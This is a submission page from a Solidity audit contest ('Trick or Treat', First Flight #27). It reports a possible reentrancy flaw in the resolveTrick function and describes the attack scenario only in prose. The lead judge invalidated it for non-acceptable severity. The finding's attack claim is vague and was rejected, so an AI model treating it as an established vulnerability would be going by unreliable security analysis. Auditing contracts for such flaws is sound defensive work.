Trick or Treat

First Flight #27

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: medium

Invalid

Potential Reentrancy in `resolveTrick` Function

mishraji874

Description: The resolveTrick function transfers an NFT to the caller before cleaning up the storage related to pending NFTs. This sequence can potentially allow reentrancy attacks if the transferred NFT triggers a fallback function in a malicious contract.

Found in src/TrickOrTreat.sol Line: 131

_transfer(address(this), msg.sender, tokenId);

Impact: An attacker could exploit this by repeatedly calling resolveTrick through a fallback function, potentially leading to unauthorized access or manipulation of the contract state

Proof of Concept:

Scenario: A malicious contract calls resolveTrick and uses a fallback function triggered by the NFT transfer to re-enter the function before storage cleanup.
Exploit: The attacker could manipulate the contract state or drain resources by exploiting the reentrancy vulnerability.

Recommended Mitigation:

Reorder the function logic to update the contract state before making any external calls.
Ensure that the nonReentrant modifier is effectively used to prevent reentrant calls.

Updates

Appeal created

bube Lead Judge about 1 year ago

Submission Judgement Published

Invalidated

Reason: Non-acceptable severity

Rewards breakdown

nSLOC

109

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.